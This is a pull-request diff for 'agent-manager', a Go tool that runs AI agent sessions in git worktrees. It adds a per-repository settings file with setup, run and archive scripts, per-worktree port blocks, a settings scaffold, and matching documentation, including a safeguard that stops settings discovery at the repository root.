### PR TITLE
feat: project setup and run scripts

### DIFF
--- a/.agent-manager/settings.toml
+++ b/.agent-manager/settings.toml
@@ -1,0 +1,22 @@
+# How agent-manager bootstraps and runs its own worktrees.
+# Reference: docs/project-settings.md
+
+# A fresh worktree has no module cache warmed and no binary built. Doing it
+# here means the agent's first `go test` is not also the first download.
+setup = """
+go mod download
+go build ./...
+"""
+
+[run.test]
+command = "go test ./..."
+description = "the whole suite"
+default = true
+
+[run.check]
+command = "gofmt -l . && go vet ./... && go test ./..."
+description = "what CI runs"
+
+[run.tui]
+command = "go run ."
+description = "this manager, from source"

--- a/.agent-manager/settings.toml
+++ b/.agent-manager/settings.toml
@@ -1,22 +1,35 @@
 # How agent-manager bootstraps and runs its own worktrees.
 # Reference: docs/project-settings.md
 
-# A fresh worktree has no module cache warmed and no binary built. Doing it
-# here means the agent's first `go test` is not also the first download.
-setup = """
+# A fresh worktree has nothing warmed: no module cache, no build. Doing it
+# here means the agent's first `go test` is not also the first download, and
+# a worktree that cannot build says so before an agent starts working in it.
+setup = '''
 go mod download
 go build ./...
-"""
+'''
+
+# Testing a worktree's build means running this manager inside this manager.
+# HOME is redirected at a directory inside the worktree because config.Dir()
+# resolves under it: without that, a half-finished build would be reading and
+# writing the real ~/.config/agent-manager/state.db — your actual sessions —
+# and a bug in the thing under test would land on the sessions you were using
+# to test it. The dev instance therefore starts empty, every time.
+#
+# O attaches to this pane rather than opening a browser, since a TUI has
+# nothing to serve.
+[run.tui]
+command = '''
+mkdir -p .am-dev-home
+go build -o .am-dev . && HOME="$PWD/.am-dev-home" exec ./.am-dev
+'''
+description = "this manager, built from this worktree, on its own state"
+default = true
 
 [run.test]
 command = "go test ./..."
 description = "the whole suite"
-default = true
 
 [run.check]
 command = "gofmt -l . && go vet ./... && go test ./..."
 description = "what CI runs"
-
-[run.tui]
-command = "go run ."
-description = "this manager, from source"

--- a/.gitignore
+++ b/.gitignore
@@ -16,3 +16,7 @@ docs/badges/contributors.png
 *.p12
 id_rsa
 id_ed25519
+
+# dev builds of this manager, made by [run.tui]
+/.am-dev
+/.am-dev-home/

--- a/README.md
+++ b/README.md
@@ -33,7 +33,7 @@ The tools you use alongside agents live in the same list: `T` opens a plain shel
 
 Not here yet: cost tracking, mouse-driven navigation, and agents that can talk to each other.
 
-**Jump to:** [Install](#install) · [Usage](#usage) · [Keys](docs/usage.md#keys) · [Diff review](docs/usage.md#diff-review) · [Configuration](docs/configuration.md) · [Docs site](https://agent-manager.dev/docs/)
+**Jump to:** [Install](#install) · [Usage](#usage) · [Keys](docs/usage.md#keys) · [Diff review](docs/usage.md#diff-review) · [Configuration](docs/configuration.md) · [Project settings](docs/project-settings.md) · [Docs site](https://agent-manager.dev/docs/)
 
 ## Supported tools
 

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -9,6 +9,20 @@ in one person's `~/.config/agent-manager/config.toml`.
 Everything here is opt-in. A repository without the file behaves exactly as
 it did before.
 
+## Creating it
+
+Press `p` in a repository that has no settings and agent-manager offers to
+write one for you: `↵` creates `.agent-manager/settings.toml` at the
+repository root — not the session's directory, so a session started a level
+down does not leave a stray file there — and opens it in your editor.
+
+The starter it writes is entirely commented out, so creating it changes
+nothing until you fill it in. An existing settings file is never overwritten.
+
+Edits take effect on the next `p`; there is nothing to reload. Changing
+`setup`, though, only affects worktrees created afterwards — it runs at
+worktree creation, so an existing one keeps whatever it was set up with.
+
 ```toml
 # Runs once inside every new worktree, before its agent starts.
 setup = """

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -9,15 +9,30 @@ in one person's `~/.config/agent-manager/config.toml`.
 Everything here is opt-in. A repository without the file behaves exactly as
 it did before.
 
-## Creating it
+## Creating it from the TUI
 
-Press `p` in a repository that has no settings and agent-manager offers to
-write one for you: `↵` creates `.agent-manager/settings.toml` at the
-repository root — not the session's directory, so a session started a level
+Two ways in, both inside the manager.
+
+**While setting up the project.** The new-group form (`g`) asks for a
+**setup** and a **run** command alongside the name, path and worktree
+default — setting up the project is exactly when you know what it takes to
+bootstrap it. Answer either and the file is written for you at the
+repository root. A project that already has settings shows them read-only,
+with `e` to open the real file: rewriting a hand-edited TOML from a form
+would have to preserve comments, key order and blocks the form has no field
+for, which is an editor, and you already have one.
+
+**From `p`.** Press `p` in a repository that has no settings and
+agent-manager offers to write one: `↵` creates `.agent-manager/settings.toml`
+at the repository root — not the session's directory, so a session started a level
 down does not leave a stray file there — and opens it in your editor.
 
 The starter it writes is entirely commented out, so creating it changes
 nothing until you fill it in. An existing settings file is never overwritten.
+
+Once a file exists, `e` opens it — from the run picker, or from the settings
+rows of the group form. A repository whose file has no run scripts opens it
+directly rather than dead-ending on an error.
 
 Edits take effect on the next `p`; there is nothing to reload. Changing
 `setup`, though, only affects worktrees created afterwards — it runs at
@@ -96,9 +111,15 @@ leave it out.
 ## Ports
 
 Running five agents at once is not much use if their dev servers all want
-port 3000. Every worktree is handed a block of ten ports, and
-`$AGENT_MANAGER_PORT` — the first of them — is exported into setup scripts,
-run scripts, and the agent's own pane. A project whose server binds it can
+port 3000. Every worktree is handed a block of ten ports, exported into setup
+scripts, run scripts and the agent's own pane under two names: `$PORT`, which
+node, rails, flask and most of the ecosystem already read, and
+`$AGENT_MANAGER_PORT` when you want to be explicit. `$PORT` is what makes
+isolation free — an unmodified `npm run dev` in five worktrees serves on five
+ports without the project changing a line.
+
+Neither is set for a project with no settings file, so opting out means doing
+nothing. A project whose server binds it can
 have every worktree serving at once. A project that ignores it is unaffected.
 
 The block is derived from the worktree's directory name rather than handed

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -91,6 +91,23 @@ file that is written but not yet committed is not in the checkout at all, so
 that case falls back to the repository the worktree branched from — the first
 attempt works rather than silently doing nothing.
 
+## The archive script
+
+```toml
+archive = "docker compose down -v"
+```
+
+Runs in a worktree that is about to be removed — on session delete, once no
+other session is using the directory. Git takes the directory away; nothing
+else knows to, so anything `setup` created *outside* it (a database, a
+container, a tunnel, a DNS record) is yours to clean up here.
+
+It runs synchronously, capped at two minutes so a wedged script cannot take
+the manager with it, with the same `$PORT` environment the other scripts get.
+A failure is reported and the removal continues: the resources have leaked
+either way, and refusing to delete the session you asked to delete would only
+add a second problem.
+
 ## Run scripts
 
 `p` runs a project command in a terminal tab beside the session under the
@@ -107,6 +124,20 @@ tellable apart.
 
 `description` is what the picker shows; the command itself is shown when you
 leave it out.
+
+`auto = true` starts a script by itself when a worktree is created, once its
+setup script has finished — for a project whose worktrees are only useful
+with the server already up. Auto-run scripts wait on a marker the setup
+wrapper writes rather than racing it: they live in separate panes with no
+channel between them, and a dev server started while dependencies are still
+installing fails in a way that looks like the project's fault. If setup never
+finishes, they give up after fifteen minutes and say so.
+
+A run script that is still going shows a small rising-and-falling bar in
+place of its row's glyph, so a server that died stops looking exactly like
+one that is serving. It is driven by the pane's foreground command — a shell
+has no turns for the status engine to track — and its tick only exists while
+something is actually running, so an idle manager schedules nothing.
 
 Starting one reports where it went — `running dev on :3170 · O opens it`.
 

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -1,0 +1,94 @@
+# Project settings
+
+A repository can tell agent-manager how to make a fresh worktree usable and
+what to run inside it. Put that in `.agent-manager/settings.toml` at the
+repository root and commit it: what it takes to bootstrap the project is the
+same for everyone working on it, so it belongs next to the code rather than
+in one person's `~/.config/agent-manager/config.toml`.
+
+Everything here is opt-in. A repository without the file behaves exactly as
+it did before.
+
+```toml
+# Runs once inside every new worktree, before its agent starts.
+setup = """
+npm ci
+cp ../myapp/.env .
+"""
+
+# The low end of the port range worktrees are handed. Optional; 3100 by default.
+port_base = 3100
+
+[run.dev]
+command = "npm run dev -- --port $AGENT_MANAGER_PORT"
+description = "dev server"
+default = true
+
+[run.test]
+command = "npm test -- --watch"
+```
+
+## The setup script
+
+A worktree is a fresh checkout. Everything the project needs that git does
+not track — installed dependencies, an `.env`, generated files — is missing
+from it, and an agent started into that tree spends its first turn on errors
+that are not the code's. `setup` is what closes that gap.
+
+It runs in the session's own pane, in the new worktree, before the agent, so
+you watch it happen instead of waiting on a spinner. It is handed to `sh`, so
+it can be a pipeline or several lines.
+
+- **On success** the agent starts exactly as it would have with no setup
+  script at all.
+- **On failure** the agent does not start. The pane says which exit code it
+  got and leaves you a shell, already in the worktree, to fix it from. Press
+  `R` to restart the session once you have.
+
+Setup only runs for sessions spawned **into a worktree** — the `alt+w` toggle
+in the quick prompt, the worktree field in the new-session form, or a group
+that defaults to worktrees. A session pointed at a checkout you already
+prepared by hand is left alone.
+
+Settings are read from the worktree, so they are versioned with the branch
+and a branch that changes its own setup script gets the new one. A settings
+file that is written but not yet committed is not in the checkout at all, so
+that case falls back to the repository the worktree branched from — the first
+attempt works rather than silently doing nothing.
+
+## Run scripts
+
+`p` runs a project command in a terminal tab beside the session under the
+cursor, in that session's directory.
+
+- One run script, or one marked `default = true`, starts straight away.
+- Several with no default open a picker, because the wrong pick here starts a
+  server or a test watcher rather than doing nothing.
+
+Each is an ordinary shell session in the list: it keeps its scrollback, and
+`x`, `v`, `a` and `d` treat it like any other row. It is named for both the
+script and the session it runs beside, so `dev` in two worktrees stays
+tellable apart.
+
+`description` is what the picker shows; the command itself is shown when you
+leave it out.
+
+## Ports
+
+Running five agents at once is not much use if their dev servers all want
+port 3000. Every worktree is handed a block of ten ports, and
+`$AGENT_MANAGER_PORT` — the first of them — is exported into setup scripts,
+run scripts, and the agent's own pane. A project whose server binds it can
+have every worktree serving at once. A project that ignores it is unaffected.
+
+The block is derived from the worktree's directory name rather than handed
+out by a counter, so it survives restarts of both the session and the
+manager: a worktree keeps the address you bookmarked for as long as it keeps
+its name. A block already listening is skipped, so two names that happen to
+collide can still both run.
+
+Need more than one port? Derive them: `$((AGENT_MANAGER_PORT + 1))`.
+
+`port_base` moves the range. The default of 3100 sits above where a
+hand-started `npm run dev` usually lands, so a worktree server and one you
+started yourself do not fight.

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -108,6 +108,12 @@ tellable apart.
 `description` is what the picker shows; the command itself is shown when you
 leave it out.
 
+Starting one reports where it went — `running dev on :3170 · O opens it` —
+and **`O`** opens `http://localhost:<port>` in your browser, so starting a
+server and looking at it are one keystroke apart. `o` opens the worktree's
+directory in your editor; `O` opens what it serves. A port with nothing on it
+says so rather than opening a browser error page.
+
 ## Ports
 
 Running five agents at once is not much use if their dev servers all want
@@ -125,14 +131,15 @@ have every worktree serving at once. A project that ignores it is unaffected.
 The block is derived from the worktree's directory name rather than handed
 out by a counter, so it survives restarts of both the session and the
 manager: a worktree keeps the address you bookmarked for as long as it keeps
-its name. A block already listening is skipped, so two names that happen to
-collide can still both run.
+its name — including while its own server is running, which is what lets `O`
+find it.
+
+Two worktree names can therefore land on the same block. That is reported
+when a script starts rather than worked around: a server failing to bind a
+port you can see beats one quietly serving on a port you cannot. Rename the
+worktree or move `port_base` if it happens.
 
 Need more than one port? Derive them: `$((AGENT_MANAGER_PORT + 1))`.
-
-A block is only handed out when **every** port in it is free, not just the
-first, so a project deriving a second port is never given a block whose upper
-half already belongs to something else.
 
 `port_base` moves the range. The default of 3100 sits above where a
 hand-started `npm run dev` usually lands, so a worktree server and one you

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -108,11 +108,19 @@ tellable apart.
 `description` is what the picker shows; the command itself is shown when you
 leave it out.
 
-Starting one reports where it went — `running dev on :3170 · O opens it` —
-and **`O`** opens `http://localhost:<port>` in your browser, so starting a
-server and looking at it are one keystroke apart. `o` opens the worktree's
-directory in your editor; `O` opens what it serves. A port with nothing on it
-says so rather than opening a browser error page.
+Starting one reports where it went — `running dev on :3170 · O opens it`.
+
+**`O` shows whatever the worktree is currently running**, which is two
+different things depending on the project and should not be two keys:
+
+- Something serving on the worktree's port opens in your **browser**.
+- Otherwise a live run session's **pane takes the terminal**, which is what
+  you want when the thing under test is a TUI rather than a server.
+- Neither, and it says so and points at `p`.
+
+Nothing configures this. What is running is a fact that can be observed, so
+it is observed rather than declared. `o` opens the worktree's directory in
+your editor; `O` opens what it is doing.
 
 ## Ports
 

--- a/docs/project-settings.md
+++ b/docs/project-settings.md
@@ -50,6 +50,12 @@ in the quick prompt, the worktree field in the new-session form, or a group
 that defaults to worktrees. A session pointed at a checkout you already
 prepared by hand is left alone.
 
+Discovery never climbs above the repository. `setup` and every run command
+are handed to a shell, so a settings file found in a directory *above* your
+checkout would be someone else's code running as you — and a shared parent
+directory is exactly where one would be planted. The walk stops at the
+repository root; a directory outside any repository is read on its own.
+
 Settings are read from the worktree, so they are versioned with the branch
 and a branch that changes its own setup script gets the new one. A settings
 file that is written but not yet committed is not in the checkout at all, so
@@ -89,6 +95,12 @@ collide can still both run.
 
 Need more than one port? Derive them: `$((AGENT_MANAGER_PORT + 1))`.
 
+A block is only handed out when **every** port in it is free, not just the
+first, so a project deriving a second port is never given a block whose upper
+half already belongs to something else.
+
 `port_base` moves the range. The default of 3100 sits above where a
 hand-started `npm run dev` usually lands, so a worktree server and one you
-started yourself do not fight.
+started yourself do not fight. It must leave room for the whole range, so it
+is rejected outside 1-64536 rather than silently handing out a port nothing
+can bind.

--- a/docs/usage.md
+++ b/docs/usage.md
@@ -14,7 +14,7 @@ Agent sessions live on a private tmux server named `agentmgr`, so they never mix
 |-----|--------|
 | `n` | New session (name, tool, directory, worktree toggle, optional starting prompt, group picker) |
 | `T` | New terminal tab: a plain shell in the selected group, with no agent in it |
-| `p` | Run a project script from `.agent-manager/settings.toml` in the row's directory ([Project settings](project-settings.md)) |
+| `p` | Run a project script from `.agent-manager/settings.toml` in the row's directory, or offer to create the file when the project has none ([Project settings](project-settings.md)) |
 | `o` | Open the selected row's directory in your editor |
 | `f` | Fork the selected conversation into a named session in the same group and directory |
 | `g` | New group (name, parent, default path) |

--- a/docs/usage.md
+++ b/docs/usage.md
@@ -16,6 +16,7 @@ Agent sessions live on a private tmux server named `agentmgr`, so they never mix
 | `T` | New terminal tab: a plain shell in the selected group, with no agent in it |
 | `p` | Run a project script from `.agent-manager/settings.toml` in the row's directory, or offer to create the file when the project has none ([Project settings](project-settings.md)) |
 | `o` | Open the selected row's directory in your editor |
+| `O` | Open what this worktree serves (`http://localhost:<port>`) in your browser |
 | `f` | Fork the selected conversation into a named session in the same group and directory |
 | `g` | New group (name, parent, default path) |
 | `enter` | Focus session in place (keys go to the agent, list stays) / fold group |

--- a/docs/usage.md
+++ b/docs/usage.md
@@ -14,6 +14,7 @@ Agent sessions live on a private tmux server named `agentmgr`, so they never mix
 |-----|--------|
 | `n` | New session (name, tool, directory, worktree toggle, optional starting prompt, group picker) |
 | `T` | New terminal tab: a plain shell in the selected group, with no agent in it |
+| `p` | Run a project script from `.agent-manager/settings.toml` in the row's directory ([Project settings](project-settings.md)) |
 | `o` | Open the selected row's directory in your editor |
 | `f` | Fork the selected conversation into a named session in the same group and directory |
 | `g` | New group (name, parent, default path) |

--- a/docs/usage.md
+++ b/docs/usage.md
@@ -16,7 +16,7 @@ Agent sessions live on a private tmux server named `agentmgr`, so they never mix
 | `T` | New terminal tab: a plain shell in the selected group, with no agent in it |
 | `p` | Run a project script from `.agent-manager/settings.toml` in the row's directory, or offer to create the file when the project has none ([Project settings](project-settings.md)) |
 | `o` | Open the selected row's directory in your editor |
-| `O` | Open what this worktree serves (`http://localhost:<port>`) in your browser |
+| `O` | Show what this worktree is running: its server in a browser, or a TUI run session's pane |
 | `f` | Fork the selected conversation into a named session in the same group and directory |
 | `g` | New group (name, parent, default path) |
 | `enter` | Focus session in place (keys go to the agent, list stays) / fold group |

--- a/internal/project/project.go
+++ b/internal/project/project.go
@@ -346,20 +346,21 @@ func (s Settings) DefaultRun() (string, bool) {
 	return "", false
 }
 
-// Port is the first port of the block belonging to a session of this name.
+// Port is the first port of the block belonging to a worktree of this name.
 // Derived from the name rather than assigned from a counter so that it
 // survives restarts of both the session and the manager: a worktree keeps
 // the address you bookmarked for as long as it keeps its name.
 //
-// A block with anything listening anywhere in it is skipped, which is what
-// makes two names that happen to hash together still able to run at once.
-// The whole block is checked rather than only its base, since a project
-// deriving a second port from $AGENT_MANAGER_PORT would otherwise be handed
-// a block whose upper ports are already someone else's.
+// Deliberately does not probe. An earlier version skipped a block that was
+// already listening, which reads as helpful and is self-defeating: the
+// moment a worktree's own server came up, its port was "busy" and Port moved
+// somewhere else, so nothing could look up where that server was. A port
+// that answers the question "where is this worktree served" has to give the
+// same answer before and after the thing is running.
 //
-// The probe is a hint, not a reservation — nothing stops a process taking
-// the port between the probe and the server starting — so a project that
-// cannot tolerate that should bind and fail loudly rather than share.
+// Two names can therefore collide. That is reported when a script starts —
+// see BlockBusy — rather than worked around, because a server failing to
+// bind a port you can see beats one quietly serving on a port you cannot.
 func (s Settings) Port(name string) int {
 	base := s.PortBase
 	if base == 0 {
@@ -367,17 +368,16 @@ func (s Settings) Port(name string) int {
 	}
 	hash := fnv.New32a()
 	_, _ = hash.Write([]byte(name))
-	start := int(hash.Sum32() % portBlocks)
-	for offset := range portBlocks {
-		port := base + ((start+offset)%portBlocks)*portBlockSize
-		if blockFree(port) {
-			return port
-		}
-	}
-	// Every block busy: hand back the name's own, so the failure the project
-	// sees is its server refusing the port rather than a silent move to
-	// somewhere it was not expecting.
-	return base + start*portBlockSize
+	return base + int(hash.Sum32()%portBlocks)*portBlockSize
+}
+
+// BlockBusy reports whether anything is already listening in the block a
+// worktree of this name owns, so starting a script there can say so. The
+// whole block is checked, not just its base, since a project deriving a
+// second port from $AGENT_MANAGER_PORT would collide on the upper ports
+// without ever touching the first.
+func (s Settings) BlockBusy(name string) bool {
+	return !blockFree(s.Port(name))
 }
 
 // blockFree reports whether nothing is listening anywhere in the block that
@@ -389,6 +389,19 @@ func blockFree(port int) bool {
 		}
 	}
 	return true
+}
+
+// Listening reports whether something is already serving on the port, which
+// is how a worktree's server is told apart from one that was never started.
+func Listening(port int) bool {
+	return !portFree(port)
+}
+
+// URL is where a worktree's server is reached. Bound to localhost rather than
+// the port alone so a caller opens an address rather than assembling one, and
+// so a project serving somewhere else has one place to change.
+func (s Settings) URL(name string) string {
+	return fmt.Sprintf("http://localhost:%d", s.Port(name))
 }
 
 // portFree reports whether nothing is listening on the port yet.

--- a/internal/project/project.go
+++ b/internal/project/project.go
@@ -18,6 +18,7 @@ import (
 	"sort"
 	"strconv"
 	"strings"
+	"time"
 
 	"github.com/BurntSushi/toml"
 )
@@ -44,12 +45,20 @@ type Run struct {
 	// otherwise open. Only the first one by name wins, so adding a second
 	// default cannot make the key ambiguous.
 	Default bool `toml:"default"`
+	// Auto starts this script when a worktree is created, once its setup
+	// script has finished. A project whose worktrees are only useful with
+	// the server up should not need the reader to remember to start it.
+	Auto bool `toml:"auto"`
 }
 
 // Settings is a repository's .agent-manager/settings.toml.
 type Settings struct {
 	// Setup runs inside a newly created worktree before its agent starts.
 	Setup string `toml:"setup"`
+	// Archive runs in a worktree that is about to be removed, for whatever
+	// the setup script created outside it: a database, a container, a
+	// tunnel. Git takes the directory away; nothing else knows to.
+	Archive string `toml:"archive"`
 	// PortBase is the low end of the range worktrees are given ports from.
 	// Zero means DefaultPortBase.
 	PortBase int `toml:"port_base"`
@@ -324,6 +333,19 @@ func (s Settings) RunNames() []string {
 	return names
 }
 
+// AutoRuns names the scripts a new worktree starts on its own, in a stable
+// order so a project with several always starts them the same way.
+func (s Settings) AutoRuns() []string {
+	var names []string
+	for name, run := range s.Run {
+		if run.Auto {
+			names = append(names, name)
+		}
+	}
+	sort.Strings(names)
+	return names
+}
+
 // DefaultRun names the script p runs without opening the picker: the one
 // marked default, or the only one there is. Two scripts marked default
 // resolve to the first by name rather than to whichever the map yielded.
@@ -446,7 +468,7 @@ func (s Settings) Env(name string) map[string]string {
 //
 // agentCommand may be empty, for a pane that opens a shell rather than an
 // agent; the setup still runs first.
-func SetupCommand(setup, agentCommand string) string {
+func SetupCommand(setup, agentCommand, marker string) string {
 	setup = strings.TrimSpace(setup)
 	if setup == "" {
 		return agentCommand
@@ -459,8 +481,50 @@ func SetupCommand(setup, agentCommand string) string {
 	}
 	// $? in the else branch is the setup's own status: printf is the first
 	// command to run there, so nothing has overwritten it yet.
+	if marker != "" {
+		success = "mkdir -p " + ShellQuote(filepath.Dir(marker)) +
+			" && : > " + ShellQuote(marker) + "\n" + success
+	}
 	return "if " + setup + "\nthen\n" + success + "\nelse\n" +
 		"  printf '\\n\\033[31magent-manager: setup failed (exit %d)\\033[0m\\n" +
 		"Fix it here, then press R to restart this session.\\n\\n' \"$?\"\n" +
 		"fi"
+}
+
+// SetupMarker is the file a setup script touches on success. An auto-run
+// script waits for it rather than racing the setup: the two live in separate
+// tmux panes with no channel between them, and a dev server started against
+// a tree whose dependencies are still installing fails in a way that looks
+// like the project's fault.
+func SetupMarker(worktree string) string {
+	return filepath.Join(worktree, Dir, ".setup-complete")
+}
+
+// WaitForSetup wraps an auto-run command so it starts once the setup script
+// has reported success, and gives up rather than waiting forever on a setup
+// that failed or was never going to finish.
+//
+// A project with no setup script has nothing to wait for, so the command is
+// returned untouched.
+func WaitForSetup(marker, command string, timeout time.Duration) string {
+	if marker == "" {
+		return command
+	}
+	deadline := int(timeout.Seconds() * 5) // polls, at 200ms each
+	return fmt.Sprintf(`waited=0
+while [ ! -f %s ]; do
+  waited=$((waited + 1))
+  if [ "$waited" -gt %d ]; then
+    printf '\n\033[31magent-manager: setup did not finish; not starting this script.\033[0m\n'
+    exit 1
+  fi
+  sleep 0.2
+done
+%s`, ShellQuote(marker), deadline, command)
+}
+
+// ShellQuote wraps a string for POSIX sh. Paths reaching a generated script
+// carry whatever the filesystem allows, including spaces.
+func ShellQuote(s string) string {
+	return "'" + strings.ReplaceAll(s, "'", `'\''`) + "'"
 }

--- a/internal/project/project.go
+++ b/internal/project/project.go
@@ -164,6 +164,64 @@ func parse(path, root string) (Settings, error) {
 	return settings, nil
 }
 
+// Template is what Scaffold writes. Every line is commented out except the
+// structure, so the file it produces is inert: pressing the key that creates
+// it cannot change how anything already works, and the reader edits rather
+// than deletes.
+const Template = `# How agent-manager bootstraps and runs this project.
+# Docs: https://github.com/YoanWai/agent-manager/blob/main/docs/project-settings.md
+#
+# Commit this file. What it takes to bootstrap the project is the same for
+# everyone working on it, so it belongs next to the code.
+
+# Runs once inside every new worktree, before its agent starts. A worktree is
+# a fresh checkout, so anything git does not track is missing from it.
+# On failure the agent does not start and the pane leaves you a shell.
+# setup = """
+# npm ci
+# cp ../` + "`basename $PWD`" + `/.env .
+# """
+
+# The low end of the port range worktrees are handed. 3100 by default.
+# port_base = 3100
+
+# Scripts p offers. Mark one default = true to have p run it without asking.
+# $AGENT_MANAGER_PORT is this worktree's own port, so every branch can serve
+# at once; derive more with $((AGENT_MANAGER_PORT + 1)).
+# [run.dev]
+# command = "npm run dev -- --port $AGENT_MANAGER_PORT"
+# description = "dev server"
+# default = true
+
+# [run.test]
+# command = "npm test -- --watch"
+`
+
+// Scaffold writes Template into root's settings path and reports where it
+// landed. An existing file is never overwritten — the point is to give a
+// project its first one, and a project that already has settings has
+// something worth more than a template.
+func Scaffold(root string) (string, error) {
+	dir := filepath.Join(root, Dir)
+	path := filepath.Join(dir, File)
+	if _, err := os.Stat(path); err == nil {
+		return path, fmt.Errorf("%s already exists", path)
+	}
+	if err := os.MkdirAll(dir, 0o755); err != nil {
+		return "", err
+	}
+	if err := os.WriteFile(path, []byte(Template), 0o644); err != nil {
+		return "", err
+	}
+	return path, nil
+}
+
+// SettingsPath is where a repository's settings live, whether or not the
+// file is there yet.
+func SettingsPath(root string) string {
+	return filepath.Join(root, Dir, File)
+}
+
 // RunNames lists the run scripts in the order the picker shows them: the
 // default first so it sits under the cursor, then the rest by name, so the
 // list a project sees never depends on map iteration order.

--- a/internal/project/project.go
+++ b/internal/project/project.go
@@ -197,11 +197,84 @@ const Template = `# How agent-manager bootstraps and runs this project.
 # command = "npm test -- --watch"
 `
 
-// Scaffold writes Template into root's settings path and reports where it
-// landed. An existing file is never overwritten — the point is to give a
-// project its first one, and a project that already has settings has
-// something worth more than a template.
-func Scaffold(root string) (string, error) {
+// Write creates a repository's settings from the two things the group form
+// asks for, and reports where they landed. Either may be empty; a run
+// command is written as the default script, since a project asked for one
+// command means that command is what p should run.
+//
+// An existing file is never rewritten. Round-tripping a hand-edited TOML
+// file through a form would have to preserve comments, key order and the
+// blocks the form has no field for, which is an editor — and the manager
+// already has a key that opens the real one.
+func Write(root, setup, run string) (string, error) {
+	setup, run = strings.TrimSpace(setup), strings.TrimSpace(run)
+	var b strings.Builder
+	b.WriteString(writtenHeader)
+	if setup != "" {
+		b.WriteString("\n# Runs once inside every new worktree, before its agent starts.\n")
+		b.WriteString("setup = " + tomlString(setup) + "\n")
+	}
+	if run != "" {
+		b.WriteString("\n# What p runs. $PORT and $" + EnvPort + " are this worktree's own,\n")
+		b.WriteString("# so every branch can serve at once.\n")
+		b.WriteString("[run.dev]\ncommand = " + tomlString(run) + "\ndefault = true\n")
+	}
+	return create(root, b.String())
+}
+
+const writtenHeader = `# How agent-manager bootstraps and runs this project.
+# Docs: https://github.com/YoanWai/agent-manager/blob/main/docs/project-settings.md
+#
+# Commit this file. What it takes to bootstrap the project is the same for
+# everyone working on it, so it belongs next to the code.
+`
+
+// tomlString renders a value as TOML.
+//
+// Literal strings are preferred because these values are shell: a literal
+// has no escape processing at all, so a backslash, a $ or a quote in a
+// command survives being written and read back exactly as typed. A value
+// carrying the literal delimiter itself falls back to a basic string, which
+// can express anything once escaped.
+func tomlString(s string) string {
+	if !strings.Contains(s, "'''") && !strings.HasSuffix(s, "'") {
+		if strings.ContainsAny(s, "\n\r") {
+			// TOML trims the newline that follows the opening delimiter but
+			// not the one before the closing delimiter, so only the leading
+			// one is written: a trailing newline would come back as content.
+			return "'''\n" + s + "'''"
+		}
+		if !strings.Contains(s, "'") {
+			return "'" + s + "'"
+		}
+	}
+	var b strings.Builder
+	b.WriteByte('"')
+	for _, r := range s {
+		switch r {
+		case '"':
+			b.WriteString(`\"`)
+		case '\\':
+			b.WriteString(`\\`)
+		case '\n':
+			b.WriteString(`\n`)
+		case '\r':
+			b.WriteString(`\r`)
+		case '\t':
+			b.WriteString(`\t`)
+		default:
+			if r < 0x20 || r == 0x7f {
+				fmt.Fprintf(&b, `\u%04X`, r)
+				continue
+			}
+			b.WriteRune(r)
+		}
+	}
+	b.WriteByte('"')
+	return b.String()
+}
+
+func create(root, body string) (string, error) {
 	dir := filepath.Join(root, Dir)
 	path := filepath.Join(dir, File)
 	if _, err := os.Stat(path); err == nil {
@@ -210,10 +283,18 @@ func Scaffold(root string) (string, error) {
 	if err := os.MkdirAll(dir, 0o755); err != nil {
 		return "", err
 	}
-	if err := os.WriteFile(path, []byte(Template), 0o644); err != nil {
+	if err := os.WriteFile(path, []byte(body), 0o644); err != nil {
 		return "", err
 	}
 	return path, nil
+}
+
+// Scaffold writes Template into root's settings path and reports where it
+// landed. An existing file is never overwritten — the point is to give a
+// project its first one, and a project that already has settings has
+// something worth more than a template.
+func Scaffold(root string) (string, error) {
+	return create(root, Template)
 }
 
 // SettingsPath is where a repository's settings live, whether or not the
@@ -320,10 +401,22 @@ func portFree(port int) bool {
 	return true
 }
 
+// EnvPortAlias is the name most dev servers already read — node, rails,
+// flask and the rest of the PORT convention. Exporting it too is what makes
+// isolation free: an unmodified `npm run dev` in five worktrees serves on
+// five ports without the project changing a line.
+const EnvPortAlias = "PORT"
+
 // Env is what a setup or run script is launched with on top of the session's
-// own environment.
+// own environment. A project that never opted in gets nothing: Env is only
+// meaningful for settings that were actually found, and exporting PORT into
+// every worktree regardless would change how unrelated projects behave.
 func (s Settings) Env(name string) map[string]string {
-	return map[string]string{EnvPort: strconv.Itoa(s.Port(name))}
+	if !s.Found {
+		return nil
+	}
+	port := strconv.Itoa(s.Port(name))
+	return map[string]string{EnvPort: port, EnvPortAlias: port}
 }
 
 // SetupCommand wraps the setup script so a failure is visible and

--- a/internal/project/project.go
+++ b/internal/project/project.go
@@ -22,8 +22,6 @@ import (
 	"github.com/BurntSushi/toml"
 )
 
-// Dir is the per-repository settings directory, and File the settings inside
-// it. Both are relative to the repository root.
 const (
 	Dir  = ".agent-manager"
 	File = "settings.toml"
@@ -79,29 +77,64 @@ const (
 	portBlockSize = 10
 )
 
-// Load reads the settings governing dir by walking up from it until a
-// .agent-manager/settings.toml turns up, stopping at the filesystem root.
-// Walking up rather than reading dir alone means a session started in a
-// subdirectory of the repository still finds them.
+// maxPortBase is the highest base whose whole range still fits below the
+// last usable port.
+const maxPortBase = 65535 - portBlocks*portBlockSize + 1
+
+// Load reads the settings governing dir, walking up from it so a session
+// started in a subdirectory of the repository still finds them.
+//
+// The walk stops at root, which must be the repository dir is inside. That
+// bound is a security boundary, not tidiness: Setup and every Run.Command
+// are handed to a shell, so a settings file picked up from a directory above
+// the repository would be someone else's code running as the user. A shared
+// parent — /tmp, a home directory, a machine where checkouts sit beside each
+// other — is exactly where that file would be planted. An empty root reads
+// dir alone, which is the safe reading when the caller cannot say where the
+// repository begins.
 //
 // A repository without the file is not an error; the returned Settings is
 // zero and Found is false.
-func Load(dir string) (Settings, error) {
+func Load(dir, root string) (Settings, error) {
 	dir, err := filepath.Abs(dir)
 	if err != nil {
 		return Settings{}, err
 	}
-	for {
-		path := filepath.Join(dir, Dir, File)
-		if _, err := os.Stat(path); err == nil {
-			return parse(path, dir)
+	// Compared as resolved paths: a repository reached through a symlink —
+	// /tmp on macOS is one — would otherwise never match its own root and
+	// the walk would stop before it started.
+	stop := resolve(dir)
+	if root != "" {
+		if abs, err := filepath.Abs(root); err == nil {
+			stop = resolve(abs)
 		}
